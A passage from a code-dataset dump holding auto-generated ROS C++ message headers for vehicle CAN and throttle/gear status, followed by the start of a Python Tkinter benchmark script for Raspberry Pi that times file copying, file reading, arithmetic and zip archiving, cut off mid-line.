['__class__', '__delattr__', '__dict__', '__doc__', '__eq__', '__format__', '__getattribute__', '__hash__', '__init__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__', '_parsed_fields', 'constants', 'fields', 'full_name', 'has_header', 'header_present', 'names', 'package', 'parsed_fields', 'short_name', 'text', 'types']\n\n\n\n\ntemplate <class ContainerAllocator>\nstruct IsFixedSize< ::zfmsg::CanInfo_<ContainerAllocator> >\n : FalseType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsFixedSize< ::zfmsg::CanInfo_<ContainerAllocator> const>\n : FalseType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsMessage< ::zfmsg::CanInfo_<ContainerAllocator> >\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsMessage< ::zfmsg::CanInfo_<ContainerAllocator> const>\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct HasHeader< ::zfmsg::CanInfo_<ContainerAllocator> >\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct HasHeader< ::zfmsg::CanInfo_<ContainerAllocator> const>\n : TrueType\n { };\n\n\ntemplate<class ContainerAllocator>\nstruct MD5Sum< ::zfmsg::CanInfo_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"9e711434ed4a101e8ef41cf060e99e89\";\n }\n\n static const char* value(const ::zfmsg::CanInfo_<ContainerAllocator>&) { return value(); }\n static const uint64_t static_value1 = 0x9e711434ed4a101eULL;\n static const uint64_t static_value2 = 0x8ef41cf060e99e89ULL;\n};\n\ntemplate<class ContainerAllocator>\nstruct DataType< ::zfmsg::CanInfo_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"zfmsg/CanInfo\";\n }\n\n static const char* value(const ::zfmsg::CanInfo_<ContainerAllocator>&) { return value(); }\n};\n\ntemplate<class ContainerAllocator>\nstruct Definition< ::zfmsg::CanInfo_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"std_msgs/Header header\\n\\\nint64 ts\\n\\\nuint8 controlMode\\n\\\nfloat32 brakePressure\\n\\\nfloat32 brakeSpeed\\n\\\nfloat32 targetBrakePressure\\n\\\nfloat32 targetBrakeSpeed\\n\\\nfloat32 targetBrakePosition\\n\\\nfloat32 brakePosition\\n\\\nbool \t breakPedalOn\\n\\\nfloat32 breakMotorCurrent\\n\\\nuint8 breakErrorCode\\n\\\n\\n\\\nfloat32 steerAngle\\n\\\nfloat32 steerSpeed\\n\\\nfloat32 targetSteerAngle\\n\\\nfloat32 targetSteerSpeed\\n\\\nfloat32 steerMotorTemperature\\n\\\nfloat32 steerMotorCurrent\\n\\\nfloat32\t steerTorque\\n\\\nfloat32 resultSetMiddleZero\\n\\\nuint8 steerErrorCode\\n\\\n\\n\\\n\\n\\\n\\n\\\nfloat32 mainMotorSpeed\\n\\\nfloat32 mainMotorCurrent\\n\\\nuint8 motorBreakOn\\n\\\nfloat32 throtle\\n\\\nstring gear\\n\\\nfloat32 targetThrotle\\n\\\nstring targetGear\\n\\\nstring gearLeverPosition\\n\\\nbool mainMotorBreakOn\\n\\\nuint8 throttleErrorCode\\n\\\n\\n\\\n================================================================================\\n\\\nMSG: std_msgs/Header\\n\\\n# Standard metadata for higher-level stamped data types.\\n\\\n# This is generally used to communicate timestamped data \\n\\\n# in a particular coordinate frame.\\n\\\n# \\n\\\n# sequence ID: consecutively increasing ID \\n\\\nuint32 seq\\n\\\n#Two-integer timestamp that is expressed as:\\n\\\n# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')\\n\\\n# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')\\n\\\n# time-handling sugar is provided by the client library\\n\\\ntime 
stamp\\n\\\n#Frame this data is associated with\\n\\\n# 0: no frame\\n\\\n# 1: global frame\\n\\\nstring frame_id\\n\\\n\";\n }\n\n static const char* value(const ::zfmsg::CanInfo_<ContainerAllocator>&) { return value(); }\n};\n\n} // namespace message_traits\n} // namespace ros\n\nnamespace ros\n{\nnamespace serialization\n{\n\n template<class ContainerAllocator> struct Serializer< ::zfmsg::CanInfo_<ContainerAllocator> >\n {\n template<typename Stream, typename T> inline static void allInOne(Stream& stream, T m)\n {\n stream.next(m.header);\n stream.next(m.ts);\n stream.next(m.controlMode);\n stream.next(m.brakePressure);\n stream.next(m.brakeSpeed);\n stream.next(m.targetBrakePressure);\n stream.next(m.targetBrakeSpeed);\n stream.next(m.targetBrakePosition);\n stream.next(m.brakePosition);\n stream.next(m.breakPedalOn);\n stream.next(m.breakMotorCurrent);\n stream.next(m.breakErrorCode);\n stream.next(m.steerAngle);\n stream.next(m.steerSpeed);\n stream.next(m.targetSteerAngle);\n stream.next(m.targetSteerSpeed);\n stream.next(m.steerMotorTemperature);\n stream.next(m.steerMotorCurrent);\n stream.next(m.steerTorque);\n stream.next(m.resultSetMiddleZero);\n stream.next(m.steerErrorCode);\n stream.next(m.mainMotorSpeed);\n stream.next(m.mainMotorCurrent);\n stream.next(m.motorBreakOn);\n stream.next(m.throtle);\n stream.next(m.gear);\n stream.next(m.targetThrotle);\n stream.next(m.targetGear);\n stream.next(m.gearLeverPosition);\n stream.next(m.mainMotorBreakOn);\n stream.next(m.throttleErrorCode);\n }\n\n ROS_DECLARE_ALLINONE_SERIALIZER\n }; // struct CanInfo_\n\n} // namespace serialization\n} // namespace ros\n\nnamespace ros\n{\nnamespace message_operations\n{\n\ntemplate<class ContainerAllocator>\nstruct Printer< ::zfmsg::CanInfo_<ContainerAllocator> >\n{\n template<typename Stream> static void stream(Stream& s, const std::string& indent, const ::zfmsg::CanInfo_<ContainerAllocator>& v)\n {\n s << indent << \"header: \";\n s << std::endl;\n Printer< ::std_msgs::Header_<ContainerAllocator> >::stream(s, indent + \" \", v.header);\n s << indent << \"ts: \";\n Printer<int64_t>::stream(s, indent + \" \", v.ts);\n s << indent << \"controlMode: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.controlMode);\n s << indent << \"brakePressure: \";\n Printer<float>::stream(s, indent + \" \", v.brakePressure);\n s << indent << \"brakeSpeed: \";\n Printer<float>::stream(s, indent + \" \", v.brakeSpeed);\n s << indent << \"targetBrakePressure: \";\n Printer<float>::stream(s, indent + \" \", v.targetBrakePressure);\n s << indent << \"targetBrakeSpeed: \";\n Printer<float>::stream(s, indent + \" \", v.targetBrakeSpeed);\n s << indent << \"targetBrakePosition: \";\n Printer<float>::stream(s, indent + \" \", v.targetBrakePosition);\n s << indent << \"brakePosition: \";\n Printer<float>::stream(s, indent + \" \", v.brakePosition);\n s << indent << \"breakPedalOn: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.breakPedalOn);\n s << indent << \"breakMotorCurrent: \";\n Printer<float>::stream(s, indent + \" \", v.breakMotorCurrent);\n s << indent << \"breakErrorCode: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.breakErrorCode);\n s << indent << \"steerAngle: \";\n Printer<float>::stream(s, indent + \" \", v.steerAngle);\n s << indent << \"steerSpeed: \";\n Printer<float>::stream(s, indent + \" \", v.steerSpeed);\n s << indent << \"targetSteerAngle: \";\n Printer<float>::stream(s, indent + \" \", v.targetSteerAngle);\n s << indent << \"targetSteerSpeed: \";\n Printer<float>::stream(s, indent + 
\" \", v.targetSteerSpeed);\n s << indent << \"steerMotorTemperature: \";\n Printer<float>::stream(s, indent + \" \", v.steerMotorTemperature);\n s << indent << \"steerMotorCurrent: \";\n Printer<float>::stream(s, indent + \" \", v.steerMotorCurrent);\n s << indent << \"steerTorque: \";\n Printer<float>::stream(s, indent + \" \", v.steerTorque);\n s << indent << \"resultSetMiddleZero: \";\n Printer<float>::stream(s, indent + \" \", v.resultSetMiddleZero);\n s << indent << \"steerErrorCode: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.steerErrorCode);\n s << indent << \"mainMotorSpeed: \";\n Printer<float>::stream(s, indent + \" \", v.mainMotorSpeed);\n s << indent << \"mainMotorCurrent: \";\n Printer<float>::stream(s, indent + \" \", v.mainMotorCurrent);\n s << indent << \"motorBreakOn: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.motorBreakOn);\n s << indent << \"throtle: \";\n Printer<float>::stream(s, indent + \" \", v.throtle);\n s << indent << \"gear: \";\n Printer<std::basic_string<char, std::char_traits<char>, typename ContainerAllocator::template rebind<char>::other > >::stream(s, indent + \" \", v.gear);\n s << indent << \"targetThrotle: \";\n Printer<float>::stream(s, indent + \" \", v.targetThrotle);\n s << indent << \"targetGear: \";\n Printer<std::basic_string<char, std::char_traits<char>, typename ContainerAllocator::template rebind<char>::other > >::stream(s, indent + \" \", v.targetGear);\n s << indent << \"gearLeverPosition: \";\n Printer<std::basic_string<char, std::char_traits<char>, typename ContainerAllocator::template rebind<char>::other > >::stream(s, indent + \" \", v.gearLeverPosition);\n s << indent << \"mainMotorBreakOn: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.mainMotorBreakOn);\n s << indent << \"throttleErrorCode: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.throttleErrorCode);\n }\n};\n\n} // namespace message_operations\n} // namespace ros\n\n#endif // ZFMSG_MESSAGE_CANINFO_H\n"
},
{
"alpha_fraction": 0.6690524816513062,
"alphanum_fraction": 0.6807543635368347,
"avg_line_length": 28.636363983154297,
"blob_id": "223e95c6b8f8d8894fd430ebbd483cd2d57eb98f",
"content_id": "5cd3fc39709af5434542c466402f97d1ce7cf332",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 8802,
"license_type": "no_license",
"max_line_length": 441,
"num_lines": 297,
"path": "/devel/include/zfmsg/ThrottleGearStatus.h",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "// Generated by gencpp from file zfmsg/ThrottleGearStatus.msg\n// DO NOT EDIT!\n\n\n#ifndef ZFMSG_MESSAGE_THROTTLEGEARSTATUS_H\n#define ZFMSG_MESSAGE_THROTTLEGEARSTATUS_H\n\n\n#include <string>\n#include <vector>\n#include <map>\n\n#include <ros/types.h>\n#include <ros/serialization.h>\n#include <ros/builtin_message_traits.h>\n#include <ros/message_operations.h>\n\n#include <std_msgs/Header.h>\n\nnamespace zfmsg\n{\ntemplate <class ContainerAllocator>\nstruct ThrottleGearStatus_\n{\n typedef ThrottleGearStatus_<ContainerAllocator> Type;\n\n ThrottleGearStatus_()\n : header()\n , ts(0)\n , controlMode(0)\n , motorSpeed(0.0)\n , motorCurrent(0.0)\n , motorBreak(0)\n , throttle(0.0)\n , gear()\n , gearLeverPosition()\n , pedalBreak(0)\n , errorCode(0) {\n }\n ThrottleGearStatus_(const ContainerAllocator& _alloc)\n : header(_alloc)\n , ts(0)\n , controlMode(0)\n , motorSpeed(0.0)\n , motorCurrent(0.0)\n , motorBreak(0)\n , throttle(0.0)\n , gear(_alloc)\n , gearLeverPosition(_alloc)\n , pedalBreak(0)\n , errorCode(0) {\n (void)_alloc;\n }\n\n\n\n typedef ::std_msgs::Header_<ContainerAllocator> _header_type;\n _header_type header;\n\n typedef int64_t _ts_type;\n _ts_type ts;\n\n typedef uint8_t _controlMode_type;\n _controlMode_type controlMode;\n\n typedef float _motorSpeed_type;\n _motorSpeed_type motorSpeed;\n\n typedef float _motorCurrent_type;\n _motorCurrent_type motorCurrent;\n\n typedef uint8_t _motorBreak_type;\n _motorBreak_type motorBreak;\n\n typedef float _throttle_type;\n _throttle_type throttle;\n\n typedef std::basic_string<char, std::char_traits<char>, typename ContainerAllocator::template rebind<char>::other > _gear_type;\n _gear_type gear;\n\n typedef std::basic_string<char, std::char_traits<char>, typename ContainerAllocator::template rebind<char>::other > _gearLeverPosition_type;\n _gearLeverPosition_type gearLeverPosition;\n\n typedef uint8_t _pedalBreak_type;\n _pedalBreak_type pedalBreak;\n\n typedef uint8_t _errorCode_type;\n _errorCode_type errorCode;\n\n\n\n\n\n typedef boost::shared_ptr< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> > Ptr;\n typedef boost::shared_ptr< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> const> ConstPtr;\n\n}; // struct ThrottleGearStatus_\n\ntypedef ::zfmsg::ThrottleGearStatus_<std::allocator<void> > ThrottleGearStatus;\n\ntypedef boost::shared_ptr< ::zfmsg::ThrottleGearStatus > ThrottleGearStatusPtr;\ntypedef boost::shared_ptr< ::zfmsg::ThrottleGearStatus const> ThrottleGearStatusConstPtr;\n\n// constants requiring out of line definition\n\n\n\ntemplate<typename ContainerAllocator>\nstd::ostream& operator<<(std::ostream& s, const ::zfmsg::ThrottleGearStatus_<ContainerAllocator> & v)\n{\nros::message_operations::Printer< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> >::stream(s, \"\", v);\nreturn s;\n}\n\n} // namespace zfmsg\n\nnamespace ros\n{\nnamespace message_traits\n{\n\n\n\n// BOOLTRAITS {'IsFixedSize': False, 'IsMessage': True, 'HasHeader': True}\n// {'std_msgs': ['/opt/ros/kinetic/share/std_msgs/cmake/../msg'], 'zfmsg': ['/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg']}\n\n// !!!!!!!!!!! 
['__class__', '__delattr__', '__dict__', '__doc__', '__eq__', '__format__', '__getattribute__', '__hash__', '__init__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__', '_parsed_fields', 'constants', 'fields', 'full_name', 'has_header', 'header_present', 'names', 'package', 'parsed_fields', 'short_name', 'text', 'types']\n\n\n\n\ntemplate <class ContainerAllocator>\nstruct IsFixedSize< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> >\n : FalseType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsFixedSize< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> const>\n : FalseType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsMessage< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> >\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsMessage< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> const>\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct HasHeader< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> >\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct HasHeader< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> const>\n : TrueType\n { };\n\n\ntemplate<class ContainerAllocator>\nstruct MD5Sum< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"ea7e7f7f909809e23589ebec1a82490c\";\n }\n\n static const char* value(const ::zfmsg::ThrottleGearStatus_<ContainerAllocator>&) { return value(); }\n static const uint64_t static_value1 = 0xea7e7f7f909809e2ULL;\n static const uint64_t static_value2 = 0x3589ebec1a82490cULL;\n};\n\ntemplate<class ContainerAllocator>\nstruct DataType< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"zfmsg/ThrottleGearStatus\";\n }\n\n static const char* value(const ::zfmsg::ThrottleGearStatus_<ContainerAllocator>&) { return value(); }\n};\n\ntemplate<class ContainerAllocator>\nstruct Definition< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"std_msgs/Header header\\n\\\nint64 ts\\n\\\nuint8 controlMode\\n\\\nfloat32 motorSpeed\\n\\\nfloat32 motorCurrent\\n\\\nuint8 motorBreak\\n\\\nfloat32 throttle\\n\\\nstring gear\\n\\\nstring gearLeverPosition\\n\\\nuint8 pedalBreak\\n\\\nuint8 errorCode\\n\\\n\\n\\\n================================================================================\\n\\\nMSG: std_msgs/Header\\n\\\n# Standard metadata for higher-level stamped data types.\\n\\\n# This is generally used to communicate timestamped data \\n\\\n# in a particular coordinate frame.\\n\\\n# \\n\\\n# sequence ID: consecutively increasing ID \\n\\\nuint32 seq\\n\\\n#Two-integer timestamp that is expressed as:\\n\\\n# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')\\n\\\n# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')\\n\\\n# time-handling sugar is provided by the client library\\n\\\ntime stamp\\n\\\n#Frame this data is associated with\\n\\\n# 0: no frame\\n\\\n# 1: global frame\\n\\\nstring frame_id\\n\\\n\";\n }\n\n static const char* value(const ::zfmsg::ThrottleGearStatus_<ContainerAllocator>&) { return value(); }\n};\n\n} // namespace message_traits\n} // namespace ros\n\nnamespace ros\n{\nnamespace serialization\n{\n\n template<class ContainerAllocator> struct Serializer< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> >\n {\n template<typename Stream, typename T> inline static void 
allInOne(Stream& stream, T m)\n {\n stream.next(m.header);\n stream.next(m.ts);\n stream.next(m.controlMode);\n stream.next(m.motorSpeed);\n stream.next(m.motorCurrent);\n stream.next(m.motorBreak);\n stream.next(m.throttle);\n stream.next(m.gear);\n stream.next(m.gearLeverPosition);\n stream.next(m.pedalBreak);\n stream.next(m.errorCode);\n }\n\n ROS_DECLARE_ALLINONE_SERIALIZER\n }; // struct ThrottleGearStatus_\n\n} // namespace serialization\n} // namespace ros\n\nnamespace ros\n{\nnamespace message_operations\n{\n\ntemplate<class ContainerAllocator>\nstruct Printer< ::zfmsg::ThrottleGearStatus_<ContainerAllocator> >\n{\n template<typename Stream> static void stream(Stream& s, const std::string& indent, const ::zfmsg::ThrottleGearStatus_<ContainerAllocator>& v)\n {\n s << indent << \"header: \";\n s << std::endl;\n Printer< ::std_msgs::Header_<ContainerAllocator> >::stream(s, indent + \" \", v.header);\n s << indent << \"ts: \";\n Printer<int64_t>::stream(s, indent + \" \", v.ts);\n s << indent << \"controlMode: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.controlMode);\n s << indent << \"motorSpeed: \";\n Printer<float>::stream(s, indent + \" \", v.motorSpeed);\n s << indent << \"motorCurrent: \";\n Printer<float>::stream(s, indent + \" \", v.motorCurrent);\n s << indent << \"motorBreak: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.motorBreak);\n s << indent << \"throttle: \";\n Printer<float>::stream(s, indent + \" \", v.throttle);\n s << indent << \"gear: \";\n Printer<std::basic_string<char, std::char_traits<char>, typename ContainerAllocator::template rebind<char>::other > >::stream(s, indent + \" \", v.gear);\n s << indent << \"gearLeverPosition: \";\n Printer<std::basic_string<char, std::char_traits<char>, typename ContainerAllocator::template rebind<char>::other > >::stream(s, indent + \" \", v.gearLeverPosition);\n s << indent << \"pedalBreak: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.pedalBreak);\n s << indent << \"errorCode: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.errorCode);\n }\n};\n\n} // namespace message_operations\n} // namespace ros\n\n#endif // ZFMSG_MESSAGE_THROTTLEGEARSTATUS_H\n"
}
] | 66 |
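The record above ends with a generated ROS C++ header whose allInOne serializer streams the fields of zfmsg/ThrottleGearStatus in declaration order. As a rough illustration only — assuming ROS1's little-endian wire format, where a string is a uint32 byte length followed by raw bytes, and omitting the std_msgs/Header prefix — the same payload order can be packed from Python; every sample value below is invented:

import struct

def pack_string(s):
    # ROS1 strings: uint32 byte length, then the bytes (no terminator).
    data = s.encode("utf-8")
    return struct.pack("<I", len(data)) + data

def pack_throttle_gear_status(ts, control_mode, motor_speed, motor_current,
                              motor_break, throttle, gear, gear_lever_position,
                              pedal_break, error_code):
    buf = struct.pack("<q", ts)              # int64 ts
    buf += struct.pack("<B", control_mode)   # uint8 controlMode
    buf += struct.pack("<f", motor_speed)    # float32 motorSpeed
    buf += struct.pack("<f", motor_current)  # float32 motorCurrent
    buf += struct.pack("<B", motor_break)    # uint8 motorBreak
    buf += struct.pack("<f", throttle)       # float32 throttle
    buf += pack_string(gear)                 # string gear
    buf += pack_string(gear_lever_position)  # string gearLeverPosition
    buf += struct.pack("<B", pedal_break)    # uint8 pedalBreak
    buf += struct.pack("<B", error_code)     # uint8 errorCode
    return buf

print(len(pack_throttle_gear_status(0, 1, 0.0, 0.0, 0, 0.5, "D", "P", 0, 0)))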
yaroshrostyslav/RaspberryPi-benchmark | https://github.com/yaroshrostyslav/RaspberryPi-benchmark | 9bbf727f19da8eda975718a8634e54be9019f544 | 0d5e54738e6c9454bb55d477fe8a120477fe0e3f | bb2f642f12c4faa9cd5d012986d55bed43576272 | refs/heads/main | 2023-03-09T16:17:30.747222 | 2021-02-25T16:22:40 | 2021-02-25T16:22:40 | 342,285,730 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5633891224861145,
"alphanum_fraction": 0.6068810224533081,
"avg_line_length": 37.519325256347656,
"blob_id": "45c62a0a2c11dc03d3e065446263819553de1da6",
"content_id": "38508d85d8332cf3ede83400dd5d370c100a4611",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15958,
"license_type": "no_license",
"max_line_length": 184,
"num_lines": 414,
"path": "/bench.py",
"repo_name": "yaroshrostyslav/RaspberryPi-benchmark",
"src_encoding": "UTF-8",
"text": "from decimal import *\nfrom tkinter import *\nimport tkinter.ttk as ttk\nimport time\nimport shutil\nimport zipfile\n# for get machine info\nimport sys, os, platform, subprocess\nsys.path.append(\"packages/\")\nimport cpuinfo\nfrom cpuinfo import get_cpu_info\nfrom threading import Thread\n\n#config\nRUN_TIME = 60;\n\ndefault_b1 = 626;\ndefault_b2 = 19550516;\ndefault_b3 = 7214769;\ndefault_b4 = 33477349;\ndefault_b5 = 4867;\n\nk_1 = Decimal(1) / Decimal(default_b1);\nk_2 = Decimal(0.3) / Decimal(default_b2);\nk_3 = Decimal(5) / Decimal(default_b3);\nk_4 = Decimal(3) / Decimal(default_b4);\nk_5 = Decimal(0.7) / Decimal(default_b5);\n\nres_1 = 0;\nres_2 = 0;\nres_3 = 0;\nres_4 = 0;\nres_5 = 0;\n\nsudo_password = '';\n\n#1\ndef copy_files():\n time.sleep(1)\n start_time_left.place(relx=0.5, rely=0.60, anchor=CENTER);\n start_logs.insert(3.0, 'Running test 1 - Flash memory write\\n')\n start_title.config(text='Test 1 of 5: Flash memory write');\n start_progress.stop();\n start_progress.start(RUN_TIME*10);\n time_end = time.time() + RUN_TIME;\n count = 0;\n while True:\n count += 1;\n shutil.copyfile(r'files/image.jpg', r'temp/image.jpg');\n if (time.time() >= time_end):\n global res_1\n res_1 = count;\n res = res_1 * k_1;\n start_logs.insert(4.0, \"Result test 1 - \"+'%f' % res + \"\\n\");\n start_logs.see(END);\n start_progress.stop();\n Thread(target=find_hash).start();\n return count;\n\n#2\ndef find_hash():\n file = 'files/PRO_WPA.txt';\n start_time_left.config(text='4 minutes left');\n start_logs.insert(5.0, 'Running test 2 - RAM speed\\n')\n start_title.config(text='Test 2 of 5: RAM speed');\n start_progress.start(RUN_TIME*10);\n time_end = time.time() + RUN_TIME;\n count = 0;\n while True:\n with open(file, 'r') as read_file:\n for line in read_file:\n new_line = line.strip('\\n')\n count += 1;\n if (time.time() >= time_end):\n global res_2\n res_2 = count;\n res = res_2 * k_2;\n start_logs.insert(6.0, \"Result test 2 - \"+'%f' % res + \"\\n\");\n start_logs.see(END);\n start_progress.stop();\n Thread(target=test_integer).start();\n return count;\n\n#3\ndef test_integer():\n start_time_left.config(text='3 minutes left');\n start_logs.insert(7.0, 'Running test 3 - Integer operations\\n')\n start_title.config(text='Test 3 of 5: Integer operations');\n start_progress.start(RUN_TIME*10);\n time_end = time.time() + RUN_TIME;\n count = 0;\n b = 0;\n while True:\n count += 1;\n b += 22226545*22+26216*222+88**88*88;\n if (time.time() >= time_end):\n global res_3\n res_3 = count;\n res = res_3 * k_3;\n start_logs.insert(8.0, \"Result test 3 - \"+'%f' % res + \"\\n\");\n start_logs.see(END);\n start_progress.stop();\n Thread(target=test_float).start();\n return count;\n\n#4\ndef test_float():\n start_time_left.config(text='2 minutes left');\n start_logs.insert(9.0, 'Running test 4 - Floating point operations\\n')\n start_title.config(text='Test 4 of 5: Floating point operations');\n start_progress.start(RUN_TIME*10);\n time_end = time.time() + RUN_TIME;\n count = 0;\n b = 0.1;\n while True:\n count += 1;\n b += 0.01;\n if (time.time() >= time_end):\n global res_4\n res_4 = count;\n res = res_4 * k_4;\n start_logs.insert(10.0, \"Result test 4 - \"+'%f' % res + \"\\n\");\n start_logs.see(END);\n start_progress.stop();\n Thread(target=create_archive).start();\n return count;\n\n#5\ndef create_archive():\n start_time_left.config(text='1 minutes left');\n start_logs.insert(11.0, 'Running test 5 - Archiving data operations\\n')\n start_title.config(text='Test 5 of 5: Archiving data 
operations');\n start_progress.start(RUN_TIME*10);\n time_end = time.time() + RUN_TIME;\n count = 0;\n while True:\n count += 1;\n newzip=zipfile.ZipFile(r'temp/images.zip','w');\n newzip.write(r'files/image.jpg');\n if (time.time() >= time_end):\n global res_5\n res_5 = count;\n res = res_5 * k_5;\n start_logs.insert(12.0, \"Result test 5 - \"+'%f' % res + \"\\n\");\n start_logs.see(END);\n start_progress.stop();\n get_result();\n return count;\n\ndef get_result():\n calc_1 = res_1 * k_1;\n calc_2 = res_2 * k_2;\n calc_3 = res_3 * k_3;\n calc_4 = res_4 * k_4;\n calc_5 = res_5 * k_5;\n result = calc_1 + calc_2 + calc_3 + calc_4 + calc_5;\n start_title.config(text=\"Result\\n\"+'%.2f' % result, anchor=CENTER, fg='#053b66', font=\"Arial 20 bold\");\n start_logs.insert(13.0, \"Result All Tests - \"+'%.2f' % result);\n start_progress.place_forget();\n start_time_left.place_forget();\n btn_end = Button(root, text=\"Ok\", width=12, height=1, font=\"Arial 14\");\n btn_end.place(relx=0.35, rely=0.69, anchor=CENTER);\n btn_other_result = Button(root, text=\"Other results\", width=12, height=1, font=\"Arial 14\");\n btn_other_result.place(relx=0.65, rely=0.69, anchor=CENTER);\n def click_btn_end(event):\n global start_progress\n start_progress = ttk.Progressbar(root, orient=HORIZONTAL, length=350, mode='determinate', value=0);\n start_logs.place_forget();\n start_logs.delete('1.0', END);\n start_title.place_forget();\n btn_end.place_forget();\n btn_other_result.place_forget();\n btn_start_test.place(relx=0.5, rely=0.57, anchor=CENTER);\n body_info_proc.place(width=100, relx=0, rely=0.85);\n body_info_proc_value.place(relx=0.20, rely=0.85);\n body_info_os.place(width=100, relx=0, rely=0.71);\n body_info_os_value.place(relx=0.20, rely=0.71);\n body_info_user.place(width=100, relx=0, rely=0.78);\n body_info_user_value.place(relx=0.20, rely=0.78);\n body_info_temp.place(width=100, relx=0, rely=0.92);\n btn_get_tempature.place(relx=0.22, rely=0.92);\n def click_btn_other_result(event):\n b = Toplevel();\n b.title(\"Benchmark v1.0 - Other results\");\n b.configure(bg='#fff');\n window__width = 600;\n window_height = 380;\n window_x = b.winfo_screenwidth() // 2 - (window__width//2);\n window_y = b.winfo_screenheight() // 2 - (window_height//2);\n b.geometry(str(window__width)+'x'+str(window_height)+'+'+str(window_x)+'+'+str(window_y-50));\n body_img_results = Label(b, image=img_results, bg='#fff');\n body_img_results.pack(expand=1);\n \n btn_end.bind(\"<ButtonRelease-1>\", click_btn_end);\n btn_other_result.bind(\"<ButtonRelease-1>\", click_btn_other_result);\n\ndef exit_program():\n root.destroy();\n\ndef about_program():\n a = Toplevel();\n a.title(\"Benchmark v1.0 - About\");\n a.configure(bg='#fff');\n window__width = 300;\n window_height = 200;\n window_x = a.winfo_screenwidth() // 2 - (window__width//2);\n window_y = a.winfo_screenheight() // 2 - (window_height//2);\n a.geometry(str(window__width)+'x'+str(window_height)+'+'+str(window_x)+'+'+str(window_y-50));\n Label(a, text=\"Benchmark v1.0 for Raspberry pi \\n\\n Developer: Yarosh Rostyslav \\n\\n Copyright © 2020\", bg='#fff', font=\"Arial 11\").pack(expand=1);\n\ndef click_start(event=''):\n global alert_start\n alert_start = Toplevel();\n alert_start.title(\"Benchmark v1.0 - Start Tests\");\n alert_start.configure(bg='#fff');\n window__width = 300;\n window_height = 200;\n window_x = alert_start.winfo_screenwidth() // 2 - (window__width//2);\n window_y = alert_start.winfo_screenheight() // 2 - (window_height//2);\n 
alert_start.geometry(str(window__width)+'x'+str(window_height)+'+'+str(window_x)+'+'+str(window_y));\n Label(alert_start, text=\"Please close all third-party applications \\n to get an accurate result!\", bg='#fff', fg='#f00', font=\"Arial 11\").place(relx=0.5, rely=0.35, anchor=CENTER);\n btn_start = Button(alert_start, text=\"Start\", width=15, height=1, font=\"Arial 12 bold\");\n btn_start.place(relx=0.5, rely=0.70, anchor=CENTER);\n btn_start.bind(\"<ButtonRelease-1>\", click_start_test);\n\n# after click start\ndef click_start_test(event):\n alert_start.destroy();\n start_title.config(text='Loading...', fg='#000', font=\"Arial 15\");\n btn_start_test.place_forget();\n body_info_proc.place_forget();\n body_info_proc_value.place_forget();\n body_info_os.place_forget();\n body_info_os_value.place_forget();\n body_info_user.place_forget();\n body_info_user_value.place_forget();\n body_info_temp.place_forget();\n btn_get_tempature.place_forget();\n body_info_temp_value.place_forget();\n\n start_title.place(relx=0.5, rely=0.54, anchor=CENTER);\n start_progress.place(relx=0.5, rely=0.66, anchor=CENTER);\n start_progress.start(10);\n start_logs.place(relx=0.5, rely=0.90, anchor=CENTER);\n start_logs.insert(1.0, 'Loading...\\n')\n start_logs.insert(2.0, 'Starting tests...\\n')\n \n # Thread(copy_files())\n Thread(target=copy_files).start();\n\n\ndef get_tempature(event):\n os_name = platform.system();\n temp = 0;\n def save_password(event):\n global sudo_password;\n if (sudo_password == ''):\n sudo_password = body_input.get()\n root2.destroy();\n command = 'powermetrics -n 1 -i 1 --samplers smc'.split();\n cmd1 = subprocess.Popen(['echo',sudo_password], stdout=subprocess.PIPE);\n cmd2 = subprocess.Popen(['sudo','-S'] + command, 